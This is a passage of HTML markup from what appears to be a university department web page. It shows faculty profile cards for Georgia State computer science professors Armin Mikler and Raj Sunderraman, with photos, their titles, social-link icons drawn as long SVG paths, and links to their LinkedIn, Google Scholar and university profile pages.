20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c12\">\n <!---->\n <!---->\n <h4 class=\"\">Armin Mikler</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p> Chair and Professor\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c18\">\n <!---->\n <!---->\n <h4 class=\"\">Raj Sunderraman</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Associate Chair and Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?hl=en&user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c24\" 